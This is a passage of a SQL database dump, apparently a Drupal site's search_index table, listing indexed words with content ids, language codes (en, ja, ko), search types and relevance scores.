('then', 67, 'ko', 'help_search', 1),
('then', 73, 'en', 'help_search', 1),
('then', 73, 'ja', 'help_search', 1),
('then', 73, 'ko', 'help_search', 1),
('theoretical', 140, 'en', 'node_search', 46),
('theoretical', 140, 'ja', 'node_search', 27),
('there', 3, 'en', 'node_search', 1),
('there', 3, 'ko', 'node_search', 1),
('there', 8, 'en', 'node_search', 2),
('there', 20, 'en', 'help_search', 1),
('there', 20, 'ja', 'help_search', 1),
('there', 20, 'ko', 'help_search', 1),
('there', 24, 'en', 'node_search', 1),
('there', 26, 'en', 'node_search', 1),
('there', 30, 'en', 'help_search', 19),
('there', 30, 'ja', 'help_search', 19),
('there', 30, 'ko', 'help_search', 19),
('there', 31, 'ja', 'help_search', 2.35233),
('there', 34, 'en', 'help_search', 2),
('there', 34, 'ja', 'help_search', 2),
('there', 34, 'ko', 'help_search', 2),
('there', 41, 'en', 'help_search', 1),
('there', 41, 'ja', 'help_search', 1),
('there', 41, 'ko', 'help_search', 1),
('there', 43, 'en', 'help_search', 1),
('there', 43, 'ja', 'help_search', 1),
('there', 43, 'ko', 'help_search', 1),
('there', 44, 'en', 'help_search', 1),
('there', 44, 'ja', 'help_search', 1),
('there', 44, 'ko', 'help_search', 1),
('there', 45, 'en', 'help_search', 1),
('there', 45, 'ja', 'help_search', 1),
('there', 45, 'ko', 'help_search', 1),
('there', 47, 'en', 'help_search', 2),
('there', 47, 'ja', 'help_search', 2),
('there', 47, 'ko', 'help_search', 2),
('there', 53, 'en', 'help_search', 1),
('there', 53, 'ja', 'help_search', 1),
('there', 53, 'ko', 'help_search', 1),
('there', 54, 'en', 'help_search', 2),
('there', 54, 'ja', 'help_search', 2),
('there', 54, 'ko', 'help_search', 2),
('there', 59, 'en', 'help_search', 1),
('there', 59, 'ja', 'help_search', 1),
('there', 59, 'ko', 'help_search', 1),
('there', 68, 'en', 'help_search', 1),
('there', 68, 'ja', 'help_search', 1),
('there', 68, 'ko', 'help_search', 1),
('there', 69, 'en', 'help_search', 2),
('there', 69, 'ja', 'help_search', 2),
('there', 69, 'ko', 'help_search', 2),
('there', 70, 'en', 'help_search', 1),
('there', 70, 'ja', 'help_search', 1),
('there', 70, 'ko', 'help_search', 1),
('there', 75, 'en', 'help_search', 3),
('there', 75, 'ja', 'help_search', 3),
('there', 75, 'ko', 'help_search', 3),
('there', 76, 'en', 'help_search', 1),
('there', 76, 'ja', 'help_search', 1),
('there', 76, 'ko', 'help_search', 1),
('there', 78, 'en', 'help_search', 1),
('there', 78, 'ja', 'help_search', 1),
('there', 78, 'ko', 'help_search', 1),
('there', 84, 'en', 'help_search', 1),
('there', 84, 'ja', 'help_search', 1),
('there', 84, 'ko', 'help_search', 1),
('there', 89, 'en', 'help_search', 1),
('there', 89, 'ja', 'help_search', 1),
('there', 89, 'ko', 'help_search', 1),
('there', 91, 'en', 'help_search', 2),
('there', 91, 'ja', 'help_search', 2),
('there', 91, 'ko', 'help_search', 2),
('there', 92, 'en', 'help_search', 1),
('there', 92, 'ja', 'help_search', 1),
('there', 92, 'ko', 'help_search', 1),
('there', 93, 'en', 'help_search', 0.934703),
('there', 93, 'ja', 'help_search', 0.934703),
('there', 93, 'ko', 'help_search', 0.934703),
('thereby', 30, 'en', 'help_search', 0.786915),
('thereby', 30, 'ja', 'help_search', 0.786915),
('thereby', 30, 'ko', 'help_search', 0.786915),
('these', 7, 'en', 'help_search', 1),
('these', 7, 'ja', 'help_search', 1),
('these', 7, 'ko', 'help_search', 1),
('these', 23, 'en', 'help_search', 1.95723),
('these', 23, 'ja', 'help_search', 1.95723),
('these', 23, 'ko', 'help_search', 1.95723),
('these', 25, 'ja', 'help_search', 1),
('these', 26, 'en', 'help_search', 1),
('these', 26, 'ja', 'help_search', 1),
('these', 26, 'ko', 'help_search', 1),
('these', 28, 'en', 'help_search', 0.776703),
('these', 28, 'ja', 'help_search', 0.776703),
('these', 28, 'ko', 'help_search', 0.776703),
('these', 30, 'en', 'help_search', 1),
('these', 30, 'ja', 'help_search', 1),
('these', 30, 'ko', 'help_search', 1),
('these', 32, 'en', 'help_search', 1),
('these', 32, 'ja', 'help_search', 1),
('these', 32, 'ko', 'help_search', 1),
('these', 35, 'en', 'help_search', 0.989021),
('these', 35, 'ja', 'help_search', 0.989021),
('these', 35, 'ko', 'help_search', 0.989021),
('these', 38, 'en', 'help_search', 1),
('these', 38, 'ja', 'help_search', 1),
('these', 38, 'ko', 'help_search', 1),
('these', 39, 'en', 'help_search', 1),
('these', 39, 'ja', 'help_search', 1),
('these', 39, 'ko', 'help_search', 1),
('these', 42, 'en', 'help_search', 2.99315),
('these', 42, 'ja', 'help_search', 2.99315),
('these', 42, 'ko', 'help_search', 2.99315),
('these', 46, 'en', 'help_search', 1),
('these', 46, 'ja', 'help_search', 1),
('these', 46, 'ko', 'help_search', 1),
('these', 47, 'en', 'help_search', 1),
('these', 47, 'ja', 'help_search', 1),
('these', 47, 'ko', 'help_search', 1),
('these', 52, 'en', 'help_search', 1),
('these', 52, 'ja', 'help_search', 1),
('these', 52, 'ko', 'help_search', 1),
('these', 55, 'en', 'help_search', 1),
('these', 55, 'ja', 'help_search', 1),
('these', 55, 'ko', 'help_search', 1),
('these', 67, 'en', 'help_search', 0.972861),
('these', 67, 'ja', 'help_search', 0.972861),
('these', 67, 'ko', 'help_search', 0.972861),
('these', 69, 'en', 'help_search', 1),
('these', 69, 'ja', 'help_search', 1),
('these', 69, 'ko', 'help_search', 1),
('these', 70, 'en', 'help_search', 1),
('these', 70, 'ja', 'help_search', 1),
('these', 70, 'ko', 'help_search', 1),
('these', 72, 'en', 'help_search', 2),
('these', 72, 'ja', 'help_search', 2),
('these', 72, 'ko', 'help_search', 2),
('these', 77, 'en', 'help_search', 1),
('these', 77, 'ja', 'help_search', 1),
('these', 77, 'ko', 'help_search', 1),
('these', 80, 'en', 'help_search', 2.9689),
('these', 80, 'ja', 'help_search', 2.9689),
('these', 80, 'ko', 'help_search', 2.9689),
('these', 82, 'en', 'help_search', 1),
('these', 82, 'ja', 'help_search', 1),
('these', 82, 'ko', 'help_search', 1),
('these', 90, 'en', 'help_search', 1),
('these', 90, 'ja', 'help_search', 1),
('these', 90, 'ko', 'help_search', 1),
('these', 136, 'en', 'node_search', 1),
('these', 173, 'en', 'node_search', 1),
('these', 189, 'en', 'node_search', 1),
('thet', 73, 'en', 'node_search', 1),
('thet', 73, 'ja', 'node_search', 1),
('thet', 79, 'en', 'node_search', 1),
('thet', 80, 'en', 'node_search', 5),
('thet', 80, 'ja', 'node_search', 4.99731),
('thet', 92, 'en', 'node_search', 2),
('thet', 92, 'ja', 'node_search', 2),
('thet', 93, 'en', 'node_search', 27),
('thet', 97, 'en', 'node_search', 2),
('thet', 97, 'ja', 'node_search', 2),
('thet', 111, 'en', 'node_search', 2),
('thet', 111, 'ja', 'node_search', 2),
('thet', 146, 'en', 'node_search', 29),
('thet', 146, 'ja', 'node_search', 1),
('thet', 169, 'en', 'node_search', 1),
('thet', 169, 'ja', 'node_search', 1),
('thet', 189, 'en', 'node_search', 6),
('thet', 189, 'ja', 'node_search', 3.99983),
('they', 3, 'en', 'node_search', 1),
('they', 3, 'ko', 'node_search', 1),
('they', 18, 'en', 'help_search', 1),
('they', 18, 'ja', 'help_search', 1),
('they', 18, 'ko', 'help_search', 1),
('they', 23, 'en', 'node_search', 0.836446),
('they', 30, 'en', 'help_search', 0.693594),
('they', 30, 'ja', 'help_search', 0.693594),
('they', 30, 'ko', 'help_search', 0.693594),
('they', 31, 'ja', 'help_search', 1.96498),
('they', 35, 'en', 'help_search', 1),
('they', 35, 'ja', 'help_search', 1),
('they', 35, 'ko', 'help_search', 1),
('they', 38, 'en', 'help_search', 1),
('they', 38, 'ja', 'help_search', 1),
('they', 38, 'ko', 'help_search', 1),
('they', 40, 'en', 'help_search', 1),
('they', 40, 'ja', 'help_search', 1),
('they', 40, 'ko', 'help_search', 1),
('they', 42, 'en', 'help_search', 1),
('they', 42, 'ja', 'help_search', 1),
('they', 42, 'ko', 'help_search', 1),
('they', 44, 'en', 'help_search', 1),
('they', 44, 'ja', 'help_search', 1),
('they', 44, 'ko', 'help_search', 1),
('they', 45, 'en', 'help_search', 1),
('they', 45, 'ja', 'help_search', 1),
('they', 45, 'ko', 'help_search', 1),
('they', 46, 'en', 'help_search', 1),
('they', 46, 'ja', 'help_search', 1),
('they', 46, 'ko', 'help_search', 1),
('they', 47, 'en', 'help_search', 1),
('they', 47, 'ja', 'help_search', 1),
('they', 47, 'ko', 'help_search', 1),
('they', 48, 'en', 'help_search', 1),
('they', 48, 'ja', 'help_search', 1),
('they', 48, 'ko', 'help_search', 1),
('they', 50, 'en', 'help_search', 2),
('they', 50, 'ja', 'help_search', 2),
('they', 50, 'ko', 'help_search', 2),
('they', 61, 'en', 'help_search', 1),
('they', 61, 'ja', 'help_search', 1),
('they', 61, 'ko', 'help_search', 1),
('they', 67, 'ja', 'node_search', 2),
('they', 68, 'en', 'help_search', 2),
('they', 68, 'ja', 'help_search', 2),
('they', 68, 'ko', 'help_search', 2),
('they', 69, 'en', 'help_search', 1),
('they', 69, 'ja', 'help_search', 1),
('they', 69, 'ko', 'help_search', 1),
('they', 80, 'en', 'node_search', 1),
('they', 86, 'en', 'help_search', 2),
('they', 86, 'ja', 'help_search', 2),
('they', 86, 'ko', 'help_search', 2),
('they', 136, 'en', 'node_search', 1),
('they', 138, 'en', 'node_search', 1),
('they', 150, 'en', 'node_search', 1),
('they', 154, 'en', 'node_search', 1),
('they', 157, 'en', 'node_search', 3),
('they', 165, 'en', 'node_search', 1),
('they', 167, 'en', 'node_search', 2),
('they', 169, 'en', 'node_search', 3),
('they', 173, 'en', 'node_search', 1),
('they', 176, 'en', 'node_search', 4),
('they', 184, 'en', 'node_search', 2),
('thi', 154, 'en', 'node_search', 1),
('thi', 154, 'ja', 'node_search', 1),
('thida', 68, 'en', 'node_search', 4),
('thida', 68, 'ja', 'node_search', 4),
('thida', 143, 'en', 'node_search', 28),
('thida', 143, 'ja', 'node_search', 31),
('thidar', 105, 'en', 'node_search', 2),
('thidar', 105, 'ja', 'node_search', 2),
('thing', 3, 'en', 'node_search', 6),
('thing', 3, 'ko', 'node_search', 6),
('things', 87, 'en', 'node_search', 29),
('things', 87, 'ja', 'node_search', 27.5732),
('thingyan', 125, 'en', 'node_search', 28),
('thingyan', 125, 'ja', 'node_search', 31),
('thirdparty', 23, 'en', 'help_search', 1),
('thirdparty', 23, 'ja', 'help_search', 1),
('thirdparty', 23, 'ko', 'help_search', 1),
('thirdparty', 68, 'en', 'help_search', 1),
('thirdparty', 68, 'ja', 'help_search', 1),
('thirdparty', 68, 'ko', 'help_search', 1),
('thiri', 178, 'en', 'node_search', 2),
('thiri', 178, 'ja', 'node_search', 1.78178),
('this', 5, 'en', 'help_search', 1),
('this', 5, 'ja', 'help_search', 1),
('this', 5, 'ko', 'help_search', 1),
('this', 7, 'en', 'help_search', 3.89876),
('this', 7, 'en', 'node_search', 6),
('this', 7, 'ja', 'help_search', 3.89876),
('this', 7, 'ko', 'help_search', 3.89876),
('this', 7, 'ko', 'node_search', 6),
('this', 20, 'en', 'help_search', 1),
('this', 20, 'ja', 'help_search', 1),
('this', 20, 'ko', 'help_search', 1),
('this', 21, 'en', 'help_search', 4),
('this', 21, 'ja', 'help_search', 4),
('this', 21, 'ko', 'help_search', 4),
('this', 22, 'en', 'help_search', 1),
('this', 22, 'ja', 'help_search', 1),
('this', 22, 'ko', 'help_search', 1),
('this', 23, 'en', 'help_search', 1.97685),
('this', 23, 'ja', 'help_search', 1.97685),
('this', 23, 'ko', 'help_search', 1.97685),
('this', 28, 'en', 'help_search', 4.73792),
('this', 28, 'ja', 'help_search', 4.73792),
('this', 28, 'ko', 'help_search', 4.73792),
('this', 30, 'en', 'help_search', 2.73112),
('this', 30, 'ja', 'help_search', 2.73112),
('this', 30, 'ko', 'help_search', 2.73112),
('this', 32, 'en', 'help_search', 1),
('this', 32, 'ja', 'help_search', 1),
('this', 32, 'ko', 'help_search', 1),
('this', 35, 'en', 'help_search', 2),
('this', 35, 'ja', 'help_search', 2),
('this', 35, 'ko', 'help_search', 2),
('this', 37, 'en', 'help_search', 3.90974),
('this', 37, 'ja', 'help_search', 3.90974),
('this', 37, 'ko', 'help_search', 3.90974),
('this', 38, 'en', 'help_search', 1),
('this', 38, 'ja', 'help_search', 1),
('this', 38, 'ko', 'help_search', 1),
('this', 43, 'en', 'help_search', 1),
('this', 43, 'ja', 'help_search', 1),
('this', 43, 'ko', 'help_search', 1),
('this', 45, 'en', 'help_search', 2),
('this', 45, 'ja', 'help_search', 2),
('this', 45, 'ko', 'help_search', 2),
('this', 47, 'en', 'help_search', 20),
('this', 47, 'ja', 'help_search', 20),
('this', 47, 'ko', 'help_search', 20),
('this', 49, 'en', 'help_search', 1),
('this', 49, 'ja', 'help_search', 1),
('this', 49, 'ko', 'help_search', 1),
('this', 50, 'en', 'help_search', 1),
('this', 50, 'ja', 'help_search', 1),
('this', 50, 'ko', 'help_search', 1),
('this', 53, 'en', 'help_search', 1),
('this', 53, 'ja', 'help_search', 1),
('this', 53, 'ko', 'help_search', 1),
('this', 54, 'en', 'help_search', 2),
('this', 54, 'ja', 'help_search', 2),
('this', 54, 'ko', 'help_search', 2),
('this', 55, 'en', 'help_search', 2),
('this', 55, 'ja', 'help_search', 2),
('this', 55, 'ko', 'help_search', 2),
('this', 56, 'en', 'help_search', 3),
('this', 56, 'ja', 'help_search', 3),
('this', 56, 'ko', 'help_search', 3),
('this', 59, 'en', 'help_search', 2),
('this', 59, 'ja', 'help_search', 2),
('this', 59, 'ko', 'help_search', 2),
('this', 62, 'en', 'node_search', 0.851346),
('this', 63, 'en', 'help_search', 1),
('this', 63, 'ja', 'help_search', 1),
('this', 63, 'ko', 'help_search', 1),
('this', 64, 'en', 'help_search', 1),
('this', 64, 'ja', 'help_search', 1),
('this', 64, 'ko', 'help_search', 1),
('this', 66, 'en', 'node_search', 2.92027),
('this', 67, 'en', 'help_search', 1),
('this', 67, 'ja', 'help_search', 1),
('this', 67, 'ko', 'help_search', 1),
('this', 68, 'en', 'help_search', 1.92384),
('this', 68, 'ja', 'help_search', 1.92384),
('this', 68, 'ko', 'help_search', 1.92384),
('this', 75, 'en', 'help_search', 3),
('this', 75, 'ja', 'help_search', 3),
('this', 75, 'ko', 'help_search', 3),
('this', 79, 'en', 'help_search', 1),
('this', 79, 'ja', 'help_search', 1),
('this', 79, 'ko', 'help_search', 1),
('this', 85, 'en', 'help_search', 6),
('this', 85, 'ja', 'help_search', 6),
('this', 85, 'ko', 'help_search', 6),
('this', 88, 'en', 'help_search', 2),
('this', 88, 'ja', 'help_search', 2),
('this', 88, 'ko', 'help_search', 2),
('this', 90, 'en', 'help_search', 1),
('this', 90, 'ja', 'help_search', 1),
('this', 90, 'ko', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('this', 92, 'en', 'help_search', 1),
('this', 92, 'ja', 'help_search', 1),
('this', 92, 'ko', 'help_search', 1),
('this', 116, 'en', 'node_search', 1),
('this', 120, 'en', 'node_search', 5),
('this', 138, 'en', 'node_search', 1),
('this', 140, 'en', 'node_search', 1),
('this', 155, 'en', 'node_search', 2),
('this', 160, 'en', 'node_search', 1),
('this', 161, 'en', 'node_search', 2),
('this', 162, 'en', 'node_search', 2),
('this', 164, 'en', 'node_search', 2),
('this', 166, 'en', 'node_search', 1),
('this', 167, 'en', 'node_search', 1),
('this', 168, 'en', 'node_search', 2),
('this', 169, 'en', 'node_search', 1),
('this', 170, 'en', 'node_search', 3),
('this', 171, 'en', 'node_search', 2),
('this', 173, 'en', 'node_search', 1),
('this', 174, 'en', 'node_search', 2),
('this', 176, 'en', 'node_search', 1),
('this', 177, 'en', 'node_search', 1),
('this', 178, 'en', 'node_search', 1),
('this', 179, 'en', 'node_search', 1),
('this', 180, 'en', 'node_search', 2),
('this', 182, 'en', 'node_search', 1),
('this', 183, 'en', 'node_search', 2),
('this', 184, 'en', 'node_search', 1),
('this', 185, 'en', 'node_search', 1),
('this', 186, 'en', 'node_search', 2),
('this', 187, 'en', 'node_search', 1),
('this', 188, 'en', 'node_search', 2),
('this', 189, 'en', 'node_search', 1),
('this', 190, 'en', 'node_search', 2),
('this', 191, 'en', 'node_search', 2),
('this', 192, 'en', 'node_search', 2),
('this', 193, 'en', 'node_search', 1),
('this', 194, 'en', 'node_search', 2),
('this', 195, 'en', 'node_search', 2),
('this', 196, 'en', 'node_search', 2),
('this', 197, 'en', 'node_search', 2),
('this', 198, 'en', 'node_search', 2),
('this', 199, 'en', 'node_search', 1),
('thorough', 166, 'en', 'node_search', 1),
('thoroughly', 87, 'en', 'node_search', 1),
('those', 3, 'en', 'node_search', 1),
('those', 3, 'ko', 'node_search', 1),
('those', 4, 'en', 'node_search', 1),
('those', 4, 'ja', 'node_search', 1),
('those', 5, 'en', 'node_search', 29),
('those', 5, 'ko', 'node_search', 29),
('those', 7, 'en', 'node_search', 2),
('those', 7, 'ko', 'node_search', 2),
('those', 24, 'en', 'node_search', 7.13384),
('those', 28, 'en', 'node_search', 3),
('those', 31, 'en', 'node_search', 1),
('those', 66, 'en', 'node_search', 2),
('those', 69, 'en', 'node_search', 1),
('those', 136, 'en', 'node_search', 1),
('those', 181, 'en', 'node_search', 1),
('though', 3, 'en', 'node_search', 1),
('though', 3, 'ko', 'node_search', 1),
('threading', 7, 'en', 'help_search', 4),
('threading', 7, 'ja', 'help_search', 4),
('threading', 7, 'ko', 'help_search', 4),
('threads', 7, 'en', 'help_search', 1),
('threads', 7, 'ja', 'help_search', 1),
('threads', 7, 'ko', 'help_search', 1),
('three', 41, 'en', 'help_search', 1),
('three', 41, 'ja', 'help_search', 1),
('three', 41, 'ko', 'help_search', 1),
('three', 71, 'en', 'help_search', 1),
('three', 71, 'ja', 'help_search', 1),
('three', 71, 'ko', 'help_search', 1),
('three', 169, 'en', 'node_search', 31),
('thri', 173, 'en', 'node_search', 1),
('thri', 173, 'ja', 'node_search', 1),
('thrilled', 66, 'en', 'node_search', 1),
('thrive', 136, 'en', 'node_search', 1),
('thrive', 194, 'en', 'node_search', 1),
('throttle', 67, 'en', 'help_search', 4),
('throttle', 67, 'ja', 'help_search', 4),
('throttle', 67, 'ko', 'help_search', 4),
('through', 22, 'en', 'help_search', 1),
('through', 22, 'ja', 'help_search', 1),
('through', 22, 'ko', 'help_search', 1),
('through', 30, 'en', 'help_search', 1.67748),
('through', 30, 'ja', 'help_search', 1.67748),
('through', 30, 'ko', 'help_search', 1.67748),
('through', 35, 'en', 'help_search', 1),
('through', 35, 'ja', 'help_search', 1),
('through', 35, 'ko', 'help_search', 1),
('through', 42, 'en', 'help_search', 1),
('through', 42, 'ja', 'help_search', 1),
('through', 42, 'ko', 'help_search', 1),
('through', 67, 'ja', 'node_search', 1),
('through', 81, 'en', 'help_search', 1),
('through', 81, 'ja', 'help_search', 1),
('through', 81, 'ko', 'help_search', 1),
('through', 92, 'en', 'help_search', 1),
('through', 92, 'ja', 'help_search', 1),
('through', 92, 'ko', 'help_search', 1),
('through', 135, 'en', 'node_search', 1),
('through', 138, 'en', 'node_search', 2),
('through', 142, 'en', 'node_search', 2),
('through', 155, 'en', 'node_search', 2),
('through', 161, 'en', 'node_search', 1),
('through', 164, 'en', 'node_search', 1),
('through', 167, 'en', 'node_search', 1),
('through', 170, 'en', 'node_search', 1),
('through', 171, 'en', 'node_search', 1),
('through', 175, 'en', 'node_search', 1),
('through', 176, 'en', 'node_search', 1),
('through', 177, 'en', 'node_search', 1),
('through', 178, 'en', 'node_search', 1),
('through', 183, 'en', 'node_search', 1),
('through', 185, 'en', 'node_search', 1),
('through', 186, 'en', 'node_search', 1),
('through', 187, 'en', 'node_search', 1),
('through', 188, 'en', 'node_search', 1),
('through', 189, 'en', 'node_search', 1),
('through', 190, 'en', 'node_search', 1),
('through', 191, 'en', 'node_search', 28),
('through', 192, 'en', 'node_search', 1),
('through', 194, 'en', 'node_search', 1),
('through', 195, 'en', 'node_search', 27),
('through', 196, 'en', 'node_search', 1),
('through', 197, 'en', 'node_search', 1),
('through', 199, 'en', 'node_search', 1),
('throughout', 27, 'en', 'node_search', 0.827757),
('throughout', 120, 'en', 'node_search', 4),
('throughout', 160, 'en', 'node_search', 1),
('throughout', 168, 'en', 'node_search', 1),
('throughout', 179, 'en', 'node_search', 2),
('throughout', 180, 'en', 'node_search', 1),
('throughout', 182, 'en', 'node_search', 1),
('throughout', 184, 'en', 'node_search', 1),
('throughout', 188, 'en', 'node_search', 1),
('throughout', 192, 'en', 'node_search', 1),
('throughout', 193, 'en', 'node_search', 1),
('throughout', 194, 'en', 'node_search', 1),
('throughout', 196, 'en', 'node_search', 1),
('thu', 4, 'en', 'node_search', 1),
('thu', 4, 'ja', 'node_search', 1),
('thu', 4, 'ko', 'node_search', 1),
('thu', 5, 'ja', 'node_search', 1),
('thu', 7, 'en', 'node_search', 1),
('thu', 7, 'ja', 'node_search', 1),
('thu', 7, 'ko', 'node_search', 1),
('thu', 78, 'en', 'node_search', 1),
('thu', 78, 'ja', 'node_search', 1),
('thu', 86, 'en', 'node_search', 1),
('thu', 86, 'ja', 'node_search', 1),
('thu', 87, 'en', 'node_search', 1),
('thu', 87, 'ja', 'node_search', 1),
('thu', 89, 'en', 'node_search', 1),
('thu', 89, 'ja', 'node_search', 1),
('thu', 91, 'en', 'node_search', 1),
('thu', 91, 'ja', 'node_search', 1),
('thu', 102, 'en', 'node_search', 1),
('thu', 102, 'ja', 'node_search', 1),
('thu', 103, 'en', 'node_search', 2),
('thu', 103, 'ja', 'node_search', 2),
('thu', 104, 'en', 'node_search', 1),
('thu', 104, 'ja', 'node_search', 1),
('thu', 105, 'en', 'node_search', 1),
('thu', 105, 'ja', 'node_search', 1),
('thu', 106, 'en', 'node_search', 1),
('thu', 106, 'ja', 'node_search', 1),
('thu', 107, 'en', 'node_search', 28),
('thu', 107, 'ja', 'node_search', 31),
('thu', 109, 'en', 'node_search', 28),
('thu', 109, 'ja', 'node_search', 31),
('thu', 130, 'en', 'node_search', 1),
('thu', 130, 'ja', 'node_search', 1),
('thu', 132, 'en', 'node_search', 29),
('thu', 132, 'ja', 'node_search', 32),
('thu', 133, 'en', 'node_search', 1),
('thu', 133, 'ja', 'node_search', 1),
('thu', 134, 'en', 'node_search', 1),
('thu', 134, 'ja', 'node_search', 1),
('thu', 135, 'en', 'node_search', 1),
('thu', 135, 'ja', 'node_search', 1),
('thu', 136, 'en', 'node_search', 1),
('thu', 136, 'ja', 'node_search', 1),
('thu', 137, 'en', 'node_search', 1),
('thu', 137, 'ja', 'node_search', 1),
('thu', 138, 'en', 'node_search', 1),
('thu', 138, 'ja', 'node_search', 1),
('thu', 139, 'en', 'node_search', 1),
('thu', 139, 'ja', 'node_search', 1),
('thu', 140, 'en', 'node_search', 1),
('thu', 140, 'ja', 'node_search', 1),
('thu', 141, 'en', 'node_search', 29),
('thu', 141, 'ja', 'node_search', 32),
('thu', 142, 'en', 'node_search', 1),
('thu', 142, 'ja', 'node_search', 1),
('thu', 143, 'en', 'node_search', 1),
('thu', 143, 'ja', 'node_search', 1),
('thu', 144, 'en', 'node_search', 1),
('thu', 144, 'ja', 'node_search', 1),
('thu', 149, 'en', 'node_search', 1),
('thu', 150, 'en', 'node_search', 1),
('thu', 150, 'ja', 'node_search', 1),
('thu', 151, 'en', 'node_search', 2),
('thu', 151, 'ja', 'node_search', 2),
('thu', 152, 'en', 'node_search', 1),
('thu', 152, 'ja', 'node_search', 1),
('thu', 153, 'en', 'node_search', 1),
('thu', 153, 'ja', 'node_search', 1),
('thu', 166, 'en', 'node_search', 10),
('thu', 166, 'ja', 'node_search', 8.17358),
('thu', 167, 'en', 'node_search', 1),
('thu', 167, 'ja', 'node_search', 1),
('thu', 171, 'en', 'node_search', 5),
('thu', 171, 'ja', 'node_search', 4.11692),
('thu', 173, 'en', 'node_search', 1),
('thu', 173, 'ja', 'node_search', 1),
('thu', 175, 'en', 'node_search', 2),
('thu', 175, 'ja', 'node_search', 1.76922),
('thu', 176, 'en', 'node_search', 1),
('thu', 176, 'ja', 'node_search', 1),
('thu', 177, 'en', 'node_search', 1),
('thu', 177, 'ja', 'node_search', 1),
('thu', 188, 'en', 'node_search', 4),
('thu', 188, 'ja', 'node_search', 2.76188),
('thu', 189, 'en', 'node_search', 1),
('thu', 189, 'ja', 'node_search', 1),
('thu', 190, 'en', 'node_search', 1),
('thu', 191, 'en', 'node_search', 1),
('thu', 191, 'ja', 'node_search', 1),
('thu', 196, 'en', 'node_search', 6),
('thu', 196, 'ja', 'node_search', 4.18961),
('thu', 206, 'ja', 'node_search', 1),
('thura', 118, 'en', 'node_search', 31),
('thura', 118, 'ja', 'node_search', 31),
('thura', 124, 'en', 'node_search', 28),
('thura', 124, 'ja', 'node_search', 31),
('thursday', 142, 'en', 'node_search', 1),
('thursday', 155, 'en', 'node_search', 1),
('thwe', 146, 'en', 'node_search', 4),
('thwe', 146, 'ja', 'node_search', 1),
('thwel', 156, 'en', 'node_search', 4),
('thwel', 156, 'ja', 'node_search', 3.89166),
('thwel', 193, 'en', 'node_search', 12),
('thwel', 193, 'ja', 'node_search', 8.35803),
('time', 3, 'en', 'node_search', 1),
('time', 3, 'ko', 'node_search', 0.997306),
('time', 31, 'ja', 'help_search', 1.85135),
('time', 32, 'en', 'help_search', 1),
('time', 32, 'ja', 'help_search', 1),
('time', 32, 'ko', 'help_search', 1),
('time', 37, 'en', 'help_search', 6),
('time', 37, 'ja', 'help_search', 6),
('time', 37, 'ko', 'help_search', 6),
('time', 47, 'en', 'help_search', 1),
('time', 47, 'ja', 'help_search', 1),
('time', 47, 'ko', 'help_search', 1),
('time', 62, 'en', 'node_search', 1.83949),
('time', 70, 'en', 'help_search', 2),
('time', 70, 'ja', 'help_search', 2),
('time', 70, 'ko', 'help_search', 2),
('time', 71, 'en', 'help_search', 6),
('time', 71, 'ja', 'help_search', 6),
('time', 71, 'ko', 'help_search', 6),
('time', 74, 'en', 'help_search', 1),
('time', 74, 'ja', 'help_search', 1),
('time', 74, 'ko', 'help_search', 1),
('time', 155, 'en', 'node_search', 1),
('timeout', 67, 'en', 'help_search', 1),
('timeout', 67, 'ja', 'help_search', 1),
('timeout', 67, 'ko', 'help_search', 1),
('times', 5, 'en', 'node_search', 1),
('times', 5, 'ko', 'node_search', 1),
('times', 31, 'ja', 'help_search', 0.857458),
('times', 67, 'en', 'help_search', 0.899454),
('times', 67, 'ja', 'help_search', 0.899454),
('times', 67, 'ko', 'help_search', 0.899454),
('timestamp', 31, 'ja', 'help_search', 0.863659),
('tin', 70, 'en', 'node_search', 1),
('tin', 70, 'ja', 'node_search', 1),
('tin', 88, 'en', 'node_search', 2),
('tin', 88, 'ja', 'node_search', 2),
('tip', 81, 'en', 'help_search', 2),
('tip', 81, 'ja', 'help_search', 2),
('tip', 81, 'ko', 'help_search', 2),
('tips', 81, 'en', 'help_search', 4),
('tips', 81, 'ja', 'help_search', 4),
('tips', 81, 'ko', 'help_search', 4),
('title', 1, 'en', 'help_search', 14),
('title', 1, 'ja', 'help_search', 14),
('title', 1, 'ko', 'help_search', 14),
('title', 2, 'en', 'help_search', 20),
('title', 2, 'ja', 'help_search', 20),
('title', 2, 'ko', 'help_search', 20),
('title', 19, 'en', 'help_search', 1),
('title', 19, 'ja', 'help_search', 1),
('title', 19, 'ko', 'help_search', 1),
('title', 27, 'en', 'help_search', 1),
('title', 27, 'ja', 'help_search', 1),
('title', 27, 'ko', 'help_search', 1),
('title', 28, 'en', 'help_search', 0.942091),
('title', 28, 'ja', 'help_search', 0.942091),
('title', 28, 'ko', 'help_search', 0.942091),
('title', 46, 'en', 'help_search', 1),
('title', 46, 'ja', 'help_search', 1),
('title', 46, 'ko', 'help_search', 1),
('title', 56, 'en', 'help_search', 10),
('title', 56, 'ja', 'help_search', 10),
('title', 56, 'ko', 'help_search', 10),
('title', 57, 'en', 'help_search', 3),
('title', 57, 'ja', 'help_search', 3),
('title', 57, 'ko', 'help_search', 3),
('title', 59, 'en', 'help_search', 5),
('title', 59, 'ja', 'help_search', 5),
('title', 59, 'ko', 'help_search', 5),
('title', 61, 'en', 'help_search', 6),
('title', 61, 'ja', 'help_search', 6),
('title', 61, 'ko', 'help_search', 6),
('title', 69, 'en', 'help_search', 1),
('title', 69, 'ja', 'help_search', 1),
('title', 69, 'ko', 'help_search', 1),
('title', 91, 'en', 'help_search', 4),
('title', 91, 'ja', 'help_search', 4),
('title', 91, 'ko', 'help_search', 4),
('title', 92, 'en', 'help_search', 4),
('title', 92, 'ja', 'help_search', 4),
('title', 92, 'ko', 'help_search', 4),
('title', 204, 'en', 'node_search', 27),
('title', 204, 'ja', 'node_search', 27),
('title', 205, 'en', 'node_search', 27),
('title', 205, 'ja', 'node_search', 27),
('title', 206, 'ja', 'node_search', 27),
('tobeemployees', 23, 'en', 'node_search', 1.68362),
('today', 62, 'en', 'node_search', 0.824901),
('today', 126, 'en', 'node_search', 1),
('today', 133, 'en', 'node_search', 1),
('toe', 129, 'en', 'node_search', 28),
('toe', 129, 'ja', 'node_search', 28),
('toe', 160, 'en', 'node_search', 10),
('toe', 160, 'ja', 'node_search', 7.98095),
('toe', 173, 'en', 'node_search', 2),
('toe', 173, 'ja', 'node_search', 2),
('together', 37, 'en', 'help_search', 1),
('together', 37, 'ja', 'help_search', 1),
('together', 37, 'ko', 'help_search', 1),
('together', 66, 'en', 'node_search', 1.91323),
('toggle', 22, 'en', 'help_search', 1),
('toggle', 22, 'ja', 'help_search', 1),
('toggle', 22, 'ko', 'help_search', 1),
